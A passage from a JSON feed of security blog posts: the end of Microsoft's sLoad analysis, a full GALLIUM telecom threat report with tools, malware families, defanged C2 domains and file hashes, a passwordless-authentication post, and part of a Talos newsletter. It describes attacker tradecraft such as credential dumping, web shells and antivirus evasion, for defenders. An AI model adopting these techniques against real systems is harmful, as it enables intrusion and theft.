screenshots. At several stages during the installation as well as when running additional payloads, the malware takes several screenshots at short intervals. It then uses a BITS upload job to send the stolen screenshots to the active C2. This is the only time that it uses an upload job, and these are the only files it uploads to the C2. Once uploaded, the screenshots are deleted from the machine.\n\n\n\n\n\n## Conclusion: Multiple layers of protection against multi-stage living-off-the-land threats\n\nsLoad is just one example of the increasingly more prevalent threats that can perform most of their malicious activities by simply living off the land. In this case, it\u2019s a dangerous threat that\u2019s equipped with notorious spyware capabilities, infiltrative payload delivery, and data exfiltration capabilities. sLoad\u2019s behavior can be classified as a [Type III fileless technique](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats#type-iii-files-required-to-operate>): while it drops some malware files during installation, its use of only BITS jobs to perform most of its harmful behaviors and scheduled tasks for persistence achieves an almost fileless presence on compromised machines.\n\nTo defeat multi-stage, stealthy, and persistent threats like sLoad, [Microsoft Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>)\u2019s antivirus component uses [multiple next-generation protection engines](<https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/>) on the client and in the cloud. While most threats are identified and stopped by many of these engines, [behavioral blocking and containment](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>) capabilities detects malicious behaviors and blocks threats after they have started running:\n\n  \n\nThese detections are also surfaced in Microsoft Defender Security Center. Security operations teams can then use Microsoft Defender ATP\u2019s other capabilities like endpoint detection and response (EDR), automated investigation and response, Threat and Vulnerability Management, and Microsoft Threat Experts to investigate and respond to attacks. This reflects the defense-in-depth strategy that is central to the unified endpoint protection provided by Microsoft Defender ATP.\n\nAs part of [Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>), Microsoft Defender ATP shares security signals about this threat to other security services, which likewise inform and enrich endpoint protection. For example, Office 365 ATP\u2019s intelligence on the emails that carry sLoad is shared to and used by Microsoft Defender ATP to build even stronger defenses at the source of infection. Real-time signal-sharing across Microsoft\u2019s security services gives Microsoft Threat Protection unparalleled visibility across attack vectors and the unique ability to provide comprehensive protection against identities, endpoints, data, cloud apps, and infrastructure.\n\n \n\n**_Sujit Magar_** \n_Microsoft Defender ATP Research Team_\n\n \n\n \n\n* * *\n\n### Talk to us\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft Defender ATP community](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/bg-p/MicrosoftDefenderATPBlog>).\n\nRead all [Microsoft security intelligence blog posts](<https://www.microsoft.com/security/blog/microsoft-security-intelligence/>).\n\nFollow us on Twitter [**@MsftSecIntel**](<https://twitter.com/MsftSecIntel>).\n\n \n\nThe post [Multi-stage downloader Trojan sLoad abuses BITS almost exclusively for malicious activities](<https://www.microsoft.com/security/blog/2019/12/12/multi-stage-downloader-trojan-sload-abuses-bits-almost-exclusively-for-malicious-activities/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T17:30:26", "published": "2019-12-12T17:30:26", "id": "MSSECURE:BD0F0BF0F7D5A1716CF03AF5A3C7210C", "href": "https://www.microsoft.com/security/blog/2019/12/12/multi-stage-downloader-trojan-sload-abuses-bits-almost-exclusively-for-malicious-activities/", "type": "mssecure", "title": "Multi-stage downloader Trojan sLoad abuses BITS almost exclusively for malicious activities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T17:21:23", "bulletinFamily": "blog", "description": "Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we\u2019re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks.\n\nTo compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss. Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allows for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate their intent and are known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low cost and easy to replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points.\n\nThis activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.\n\nFollowing Microsoft\u2019s internal practices of assigning chemical elements to activity groups, GALLIUM is the code name for this activity group.\n\n### GALLIUM\u2019s profile\n\n**Reconnaissance methods**\n\nAs is often the case with the reconnaissance methods, it\u2019s difficult to be definitive about those employed by GALLIUM. This is due to the passive nature of reconnaissance activities by the actor including the use of freely available data from open sources, such as public websites and social media outlets. However, based on MSTIC analyst assessments, GALLIUM\u2019s exploitation of internet-facing services indicates it\u2019s likely they use open source research and network scanning tools to identify likely targets.\n\n### Delivery and exploitation\n\nTo gain initial access a target network, GALLIUM locates and exploits internet-facing services such as web servers. GALLIUM has been observed exploiting unpatched web services, such as WildFly/JBoss, for which exploits are widely available. Compromising a web server gives GALLIUM a foothold in the victim network that doesn\u2019t require user interaction, such as traditional delivery methods like phishing.\n\nFollowing exploitation of the web servers, GALLIUM actors typically install [web shells](<https://attack.mitre.org/techniques/T1100/>), and then install additional tooling to allow them to explore the target network.\n\n**Lateral movement**\n\nGALLIUM uses a variety of tools to perform reconnaissance and move laterally within a target network. The majority of these are off-the-shelf tools or modified versions of known security tools. MSTIC investigations indicate that GALLIUM modifies its tooling to the extent it evades antimalware detections rather than develop custom functionality. This behavior has been observed with GALLIUM actors across several operational areas.\n\nGALLIUM has been observed using several tools. Samples of the most prevalent are noted in Table 1.\n\n**Tool** | **Purpose** \n---|--- \n[HTRAN](<https://attack.mitre.org/software/S0040/>) | Connection bouncer to proxy connections. \n[Mimikatz](<https://attack.mitre.org/software/S0002/>) | Credential dumper. \n[NBTScan](<https://sectools.org/tool/nbtscan/>) | Scanner for open NETBIOS nameservers on a local or remote TCP/IP network. \nNetcat | Reads from and writes to network connections using TCP or UDP protocols. \n[PsExec](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec>) | Executes a command line process on a remote machine. \n[Windows Credential Editor (WCE)](<https://attack.mitre.org/software/S0005/>) | Credential dumper. \nWinRAR | Archiving utility. \n \n_Table __1__: GALLIUM tooling._\n\nGALLIUM has signed several tools using stolen code signing certificates. For example, they\u2019ve used a credential dumping tool signed using a stolen certificate from _Whizzimo, LLC_, as shown in Figure 1. The code signing certificate shown in Figure 1 was no longer valid at the time of writing; however, it shows GALLIUM had access to such certificates.\n\n\n\n_Figure 1. Credential dumping tool signed using a stolen Whizzimo, LLC certificate._\n\nGALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network.\n\n**Installation**\n\nGALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it\u2019s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, [QuarkBandit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/QuarkBandit.A!dha>) is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available [Poison Ivy RAT](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>). These RATs and the [China Chopper web shell](<https://attack.mitre.org/software/S0020/>) form the basis of GALLIUM\u2019s toolkit for maintaining access to a victim network.\n\n**Infrastructure**\n\nGALLIUM predominantly uses dynamic DNS subdomains to provide command and control (C2) infrastructure for their malware. Typically, the group uses the ddns.net and myftp.biz domains provided by noip.com. MSTIC analysis indicates the use of dynamic DNS providers as opposed to registered domains is in line with GALLIUM\u2019s trend towards low cost and low effort operations.\n\nGALLIUM domains have been observed hosted on infrastructure in mainland China, Hong Kong SAR, and Taiwan.\n\nWhen connecting to web shells on a target network GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation.\n\nA package of GALLIUM indicators containing GALLIUM command and control domains used during this operation have been prepared for [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) and is available on the [Microsoft GitHub](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/GalliumIOCs.yaml>).\n\n\n\n_Figure __2.__ Azure Sentinel query of GALLIUM indicators._\n\n### GALLIUM use of malware\n\n**First stage **\n\nGALLIUM does not typically use a traditional first stage installer for their malware. Instead, the group relies heavily on web shells as a first method of persistence in a victim network following successful exploitation. Subsequent malware is then delivered through existing web shell access.\n\nMicrosoft Defender Advanced Threat Protection (ATP) exposes anomalous behavior that indicate web shell installation and post compromise activity by analysing script file writes and process executions. [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) offers a number of detections for web shell activity protecting customers not just from GALLIUM activity but broader web shell activity too. Read the full report in your [Microsoft Defender ATP portal](<https://securitycenter.windows.com/threatanalytics2/52fd70be-ec19-48d7-84e8-dfb7a0ed7123>).\n\n\n\n_Figure 3. __Microsoft Defender ATP web shell detection._\n\nWhen alerted of these activities, the security operations team can then use the rich capabilities in Microsoft Defender ATP to investigate web shell activity and subsequent reconnaissance and enumeration activity to resolve web shell attacks.\n\n\n\n_Figure 4. Microsoft Defender ATP web shell process tree._\n\nIn addition to standard [China Chopper](<https://attack.mitre.org/software/S0020/>), GALLIUM has been observed using a native web shell for servers running Microsoft IIS that is based on the China Chopper web shell; Microsoft has called this \u201cBlackMould.\u201d\n\nBlackMould contains functionality to perform the following tasks on a victim host:\n\n * Enumerate local drives.\n * Employ basic file operations like find, read, write, delete, and copy.\n * Set file attributes.\n * Exfiltrate and infiltrate files.\n * Run cmd.exe with parameters.\n\nCommands are sent in the body of HTTP POST requests.\n\n**Second stage**\n\nIn cases where GALLIUM has deployed additional malware on a victim network, they\u2019ve used versions of the [Gh0st RAT](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/QuarkBandit.A!dha>) (modified Ghost RAT detected as QuarkBandit) and [Poison Ivy](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>) malware. In both cases, GALLIUM has modified the communication method used by the malware, likely to prevent detection through existing antimalware signatures since both malware families have several detections based on their original communication methods. Malware families are noted in Table 2.\n\n**Malware family** | **Description and primary usage** \n---|--- \n[BlackMould](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3aWin32%2fChopper.A>) | Native IIS web shell based on the China Chopper web shell. \n[China Chopper](<https://attack.mitre.org/software/S0020/>) | Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM. \n[Poison Ivy](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Win32/Poison>) (modified) | Poison Ivy is a widely shared remote access tool (RAT) [first identified in 2005](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>). While Poison Ivy is widely used, the variant GALLIUM has been observed using is a modified version that appears to be unique to GALLIUM. \nQuarkBandit | Gh0st RAT variant with modified configuration options and encryption. \n \n_Table __2__. GALLIUM malware families._\n\nGALLIUM\u2019s malware and tools appear to be highly disposable and low cost. In cases where GALLIUM has invested in modifications to their toolset, they appear to focus on evading antimalware detection, likely to make the malware and tooling more effective.\n\nThe MSTIC team works closely with Microsoft security products to implement detections and protections for GALLIUM malware and tooling in a number of Microsoft products. Figure 4 shows one such detection for a GALLIUM PoisonIvy loader in Microsoft Defender ATP.\n\n\n\n_Figure 5. GALLIUM PoisonIvy loader in Microsoft Defender ATP._\n\nAdditionally, MSTIC has authored a number of antimalware signatures for Windows Defender Antivirus covering the aforementioned malware families, a list of GALLIUM exclusive signature can be found in the Related indicators\u201d section.\n\nIn addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network.\n\n### Recommended defenses\n\nThe following are recommended defenses security operations teams can take to mitigate the impact of threats like GALLIUM in your corporate environment:\n\n * Maintain web server patching and log audits, run web services with minimum required operating system permissions\n * Install security updates on all applications and operating systems promptly. Check the [Security Update Guide](<https://portal.msrc.microsoft.com/>) for detailed information about available Microsoft security updates.\n * For efficient incident response, maintain a forensics-ready network with centralized event logging, file detonation services, and up-to-date asset inventories.\n * Enable cloud-delivered protection and maintain updated antivirus.\n * Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence (AI) and machine learning to quickly identify and stop new and unknown threats.\n * Use behavior detection solutions to catch credential dumping or other activity that may indicate a breach.\n * Adopt [Azure ATP](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/what-is-atp>)\u2014a cloud-based security solution that leverages your on-premises Active Directory signals\u2014to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.\n * Use [Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) to help enterprise networks prevent, detect, investigate, and respond to advanced threats. Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.\n * Institute Multi-Factor Authentication (MFA) to mitigate against compromised accounts. \n * **Note**: Microsoft strongly encourages all customers download and use passwordless solutions like the [Microsoft Authenticator](<https://www.microsoft.com/en-us/account/authenticator/>) app or Windows Hello to secure your accounts.\n * For Office 365 users, see [MFA support](<https://docs.microsoft.com/en-us/office365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365worldwide>).\n * For consumer and personal email accounts, [see how to use two-step verification](<https://support.microsoft.com/en-us/help/12408/microsoft-account-how-to-use-two-step-verification>).\n\n### Related indicators\n\nThe list below provides known GALLIUM tooling and Indicators of Compromise (IOCs) observed during this activity. Microsoft encourages customers to implement detections and protections to identify possible prior campaigns or prevent future campaigns against their systems.\n\n**Tooling**\n\n**Tool** | **Purpose** \n---|--- \nHTRAN | Connection bouncer to proxy connections. \nMimikatz | Credential dumper. \nNBTScan | Scanner for open NETBIOS nameservers on a local or remote TCP/IP network. \nNetcat | Reads from and writes to network connections using TCP or UDP protocols. \nPsExec | Executes a command line process on a remote machine. \nWindows Credential Editor (WCE) | Credential dumper. \nWinRAR | Archiving utility. \n \n**Malware**\n\n**Malware** | **Notes** \n---|--- \nBlackMould | Native IIS version of the China Chopper web shell. \nChina Chopper | Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM. \nPoison Ivy (modified) | Poison Ivy is a widely shared remote access tool (RAT) first identified in 2005. While Poison Ivy is widely used, the variant GALLIUM has been observed using is a modified version which appears to be unique to GALLIUM. \nQuarkBandit | Gh0st RAT variant with modified configuration options and encryption. \n \n**Indicators**\n\n**Indicator ** | **Typ****e ** \n---|--- \nasyspy256[.]ddns[.]net | Domain \nhotkillmail9sddcc[.]ddns[.]net | Domain \nrosaf112[.]ddns[.]net | Domain \ncvdfhjh1231[.]myftp[.]biz | Domain \nsz2016rose[.]ddns[.]net | Domain \ndffwescwer4325[.]myftp[.]biz | Domain \ncvdfhjh1231[.]ddns[.]net | Domain \n9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd | Sha256 \n7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b | Sha256 \n657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 | Sha256 \n2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 | Sha256 \n52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 | Sha256 \na370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 | Sha256 \n5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 | Sha256 \n6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 | Sha256 \n3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e | Sha256 \n1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 | Sha256 \nfe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 | Sha256 \n7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c | Sha256 \n178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 | Sha256 \n51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 | Sha256 \n889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 | Sha256 \n332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf | Sha256 \n44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 | Sha256 \n63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef | Sha256 \n056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 | Sha256 \nTrojanDropper:Win32/BlackMould.A!dha | Signature Name \nTrojan:Win32/BlackMould.B!dha | Signature Name \nTrojan:Win32/QuarkBandit.A!dha | Signature Name \nTrojan:Win32/Sidelod.A!dha | Signature Name \n \nBookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [GALLIUM: Targeting global telecom](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T17:00:10", "published": "2019-12-12T17:00:10", "id": "MSSECURE:935CD38CAA09DBE225656E26BE7AFBF5", "href": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "type": "mssecure", "title": "GALLIUM: Targeting global telecom", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T00:20:45", "bulletinFamily": "blog", "description": "We all know passwords are inherently unsecure. They\u2019re also expensive to manage. Users struggle to remember them. It\u2019s why we\u2019re so passionate about eliminating passwords entirely. Passwordless solutions, such as Windows Hello, FIDO2 security keys, and the Microsoft Authenticator app, provide more secure and convenient sign-in methods. But transitioning your organization to passwordless authentication takes time and careful planning. You may wonder where to start and how long it will take to realize benefits. Today, we examine:\n\n * How biometrics improve security while safeguarding user privacy.\n * The cost reductions Microsoft realized from passwordless migration.\n * Steps you can take to better secure your organization and prepare for passwordless.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-1.png>)\n\n_Microsoft passwordless solutions include Windows Hello, the Microsoft Authenticator app, and FIDO2 security keys._\n\n### Biometric technology improves security and safeguards user privacy\n\nThe goal of user authentication protocols, including passwords, is to verify user identity. But just because a user knows a password doesn\u2019t mean they are the person they claim to be. In fact, 81 percent of breaches leverage stolen or compromised passwords.1 Passwords are not unique identifiers.\n\nTo improve security, we need a better way to uniquely identify users. This is where biometrics come in. Your iris, fingerprint, and face are unique to you\u2014nobody else has the same fingerprint, for example. Passwordless solutions, like Windows Hello, rely on biometrics instead of passwords because biometrics are better at accurately identifying a user.\n\nBiometrics, like other personal identifying information (PII), may raise privacy concerns. Some people worry that technology companies will collect PII and make it available to other entities. Or that their biometric image might get stolen. That\u2019s why Microsoft and other security companies in the Fast IDentity Online (FIDO) Alliance developed the FIDO2 standard to raise the bar for securing credentials. Rest assured, Microsoft uses FIDO2-compliant technology that does **NOT** view, store, or transfer **ANY** biometric images.\n\nHere\u2019s how it works:\n\n * When a user creates a biometric sign-in, Windows Hello uses an algorithm to create a unique identifier that is stored locally on the device, encrypted and secured, and never shared with Microsoft.\n * Each time a user signs in, the biometric is compared against the unique identifier.\n * If there is a match, the user is authenticated to the device.\n\nTechnologies like Windows Hello are secure, convenient, and safeguard user privacy.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-2.jpg>)\n\n_Users can sign in to Windows Hello with a fingerprint scan. The fingerprint image is turned into a unique identifier stored on the device. It does not get stored by Microsoft._\n\n### Improve security, reduce costs, and increase productivity\n\nTo help you think about the costs associated with passwords, we\u2019ll share some numbers from Microsoft\u2019s own experience rolling out passwordless to its users. After about a year since Microsoft began this journey, most users don\u2019t use a password to authenticate to corporate systems, resources, and applications. The company is better protected, but it has also reduced costs.\n\nPasswords are expensive because users frequently forget them. For every password reset Microsoft incurs, soft costs are associated with the productivity lost while a user can\u2019t sign in. The company also incurs hard costs for every hour a Helpdesk administrator spends helping a Microsoft user reset their password.\n\nMicrosoft estimated the following costs before rolling out passwordless to its employees:\n\n * $3 million a year in hard costs.\n * $6 million a year in lost productivity.\n\nAs of today, Microsoft has achieved the following benefits from its passwordless rollout:\n\n * Reduced hard and soft costs by 87 percent.\n * As Microsoft costs go down, attackers\u2019 costs go up, so the company is less of a target.\n\n### Going passwordless starts with Multi-Factor Authentication\n\nWhether you\u2019re ready to roll out a passwordless authentication strategy today or in a few years, these steps will help get your organization ready.\n\n * **Step 1: Define your passwordless and biometrics strategy**\u2014At Microsoft, we allow more than one biometric factor to choose from for authentication, which gives people options and helps us meet accessibility needs.\n * **Step 2: Move your identities to the cloud**\u2014Leverage Azure Active Directory (Azure AD) user behavior analytics and security intelligence to help protect your identities, uncover breach patterns, and recover if there is a breach.\n * **Step 3:** **Enable Multi-Factor Authentication (MFA)**\u2014MFA increases security by requiring more than one factor of verification, usually in addition to a password. By enabling MFA, you can reduce the odds of account compromise by 99.9 percent.2 But passwords don\u2019t have to be a factor. With passwordless authentication, the biometric identifier is one factor of verification and the device possession is another, removing the risk of passwords from the equation.\n * **Step 4: Pilot passwordless**\u2014Start a pilot test with your riskiest users or groups.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-3.png>)\n\n_The Microsoft Authenticator app can be used to augment a password as a second factor or to replace a password with biometrics or a device PIN for authentication._\n\nIf you aren\u2019t ready to go passwordless, enable MFA to reduce your odds of a breach. We also recommend that you ban the most easily guessable passwords. Azure AD processes 60 billion authentications in a month and uses the telemetry to automatically block commonly used, weak, or compromised passwords for all Azure AD accounts, but you can add your own custom banned passwords, too.\n\n### Learn more\n\nMicrosoft passwordless solutions include Windows Hello, the Microsoft Authenticator app, and FIDO2 security keys from select partners. Each can help you accomplish the following:\n\n * Stronger security.\n * Reduced costs over time.\n * Increased attacker costs.\n * More productive users.\n\nRead more about [Microsoft passwordless solutions](<https://www.microsoft.com/en-us/security/technology/identity-access-management/passwordless>).\n\nWatch the CISO Spotlight Series: [Passwordless: What\u2019s it worth?](<https://www.microsoft.com/en-us/security/ciso-cybersecurity-strategy>)\n\n \n\n_12018 Verizon Data Breach Investigations report_ \n_22018 Microsoft Security Research_\n\nThe post [Go passwordless to strengthen security and reduce costs](<https://www.microsoft.com/security/blog/2019/12/11/go-passwordless-strengthen-security-reduce-costs/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T00:00:56", "published": "2019-12-12T00:00:56", "id": "MSSECURE:0DD55CA89ED8480FABE3316C96B992B7", "href": "https://www.microsoft.com/security/blog/2019/12/11/go-passwordless-strengthen-security-reduce-costs/", "type": "mssecure", "title": "Go passwordless to strengthen security and reduce costs", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-12T19:55:04", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nWe\u2019re entering our Year in Review period. Now\u2019s the time to look back on the top stories from 2019 and think about what we learned. \n \nIn the vulnerability space, Talos researchers were just as busy as always. We disclosed more than one vulnerability per working day this year, many of which were in internet-of-things and ICS devices. For more on what we can take away from the year in vulnerability disclosures, check out our post [here](<https://blog.talosintelligence.com/2019/12/vulnerability-discovery-2019.html>). \n \nSpeaking of vulnerabilities, we had many more to add to the yearly count this week. There\u2019s too many to name here, but some highlights include a remote code execution bug in [Apple\u2019s Safari web browser](<https://blog.talosintelligence.com/2019/12/apple-safari-SVG-DOS-dec-19.html>) and a [denial-of-service in the Linux kernel](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-linux-w1fi-dos-dec-19.html>). \n \nMicrosoft also disclosed its own set of vulnerabilities as part of the last Patch Tuesday of 2019. Check out our breakdown of the most notable bugs [here](<https://blog.talosintelligence.com/2019/12/microsoft-patch-tuesday-dec-2019.html>) and our Snort rules to protect against exploitation of them [here](<https://blog.snort.org/2019/12/snort-rule-update-for-dec-10-2019.html>). Talos discovered two of the bugs patched this month, [both in Windows Remote Desktop Protocol](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-RDP-Dec-19.html>) in older versions of Windows. \n \n\n\n### Cyber Security Week in Review\n\n * * Adobe released its [monthly security update](<https://www.bleepingcomputer.com/news/security/adobe-releases-their-december-2019-security-updates/>) Tuesday, fixing 14 critical vulnerabilities across its suite of products. Among the bugs disclosed are 14 critical vulnerabilities in Adobe Acrobat Reader. \n * A series of news reports this week revealed Ring security cameras are [open to serious exploits](<https://www.vice.com/en_us/article/3a88k5/how-hackers-are-breaking-into-ring-cameras>). In Florida, an attacker took over a Ring\u2019s speaker and shouted racial slurs at the owners. And in Tennessee, another man took over a family\u2019s device after only owning it for four days, potentially spying on three young girls and talking to one of them, saying he was santa. \n * A new report from the U.S. National Infrastructure Advisory Council warned the White House that a cyber attack on America\u2019s infrastructure [poses an \u201cexistential threat\u201d](<https://thehill.com/policy/cybersecurity/473682-federal-council-to-trump-cyber-threats-pose-existential-threat-to-the>) to the country. The group also urged U.S. President Donald Trump to take \u201cbold action\u201d to protect ICS systems. \n * A new decryptor from the makers of the Ryuk ransomware [may actually damage larger files](<https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/>). The program is meant to help a victim recover their files after paying the proposed ransom. \n * The [new \u201cSnatch\u201d ransomware](<https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/>) evades detection by rebooting Windows machines mid-infection. The malware forces the victim machine to boot in safe mode, and then begin the encryption process. \n * The city of Pensacola, Florida [continues to recover from a ransomware attack](<https://www.cbsnews.com/news/pensacola-cyberattack-hack-downs-city-computers-in-site-of-navy-attack-today-2019-12-09/>), just days after a shooting at a local military base. The city\u2019s phone lines, some email services and other online platforms were still down as of Thursday. \n * Iran says it [fended off a large cyber attack](<https://abcnews.go.com/International/wireStory/iran-defused-large-cyberattack-infrastructure-67651205>) on unspecified \u201celectronic infrastructure.\u201d One government official said he could not provide specific details on the malware, but called the threat actors \u201cvery organized\u201d and \u201cgovernmental.\u201d \n * U.S. President Donald Trump says he [discussed election security](<https://www.reuters.com/article/us-usa-russia/arms-control-election-security-could-come-up-at-trump-lavrov-meeting-white-house-idUSKBN1YE23L?il=0>) with Russian officials during a private meeting this week. Russian Foreign Minister Sergei Lavrov said in a press conference after the meeting Russia has wanted to publish information that would allegedly clear it of any wrongdoing during the 2016 U.S. presidential election, but the U.S. has blocked that release. \n * Apple released the newest version of iOS this week, which [provides new security features](<https://www.forbes.com/sites/davidphelan/2019/12/10/apple-releases-ios-133-brand-new-features-vital-bug-fixes-and-security-patches/#5dffa21075dd>) for Safari. The mobile version of the web browser now supports NFC, USB and Lightning-complaint keys so users don\u2019t have to rely only on passwords. \n * A new feature in Google Chrome will [alert users if their login credential](<https://www.techradar.com/news/google-chrome-can-now-check-if-your-passwords-have-been-stolen-heres-how>)s were exposed in a data breach. Each time the user logs into a site using the browser, it will check those credentials against a database of known leaked information.\n\n### Notable recent security issues\n\n**Title: **[Microsoft discloses two critical bugs as part of monthly security update](<https://blog.talosintelligence.com/2019/12/microsoft-patch-tuesday-dec-2019.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 25 vulnerabilities, two of which are considered critical. This month\u2019s security update covers security issues in a variety of Microsoft services and software, including Remote Desktop Protocol, Hyper-V and multiple Microsoft Office products. \n**Snort SIDs: **52402, 52403, 52410, 52411, 52419, 52420 \n** \n****Title: **[AMD ATI Radeon ATIDXX64.DLL shader functionality sincos denial-of-service vulnerability](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-amd-radeon-550-DoS-VM-dec-2019.html>) \n**Description: **Cisco Talos recently discovered a denial-of-service vulnerability in a specific DLL inside of the AMD ATI Radeon line of video cards. This vulnerability can be triggered by supplying a malformed pixel shader inside a VMware guest operating system. Such an attack can be triggered from VMware guest usermode to cause an out-of-bounds memory read on vmware-vmx.exe process on host, or theoretically through WEBGL. \n**Snort SIDs: **51461, 51462 (By Tim Muniz) \n\n\n### Most prevalent malware files this week\n\n**SHA 256: 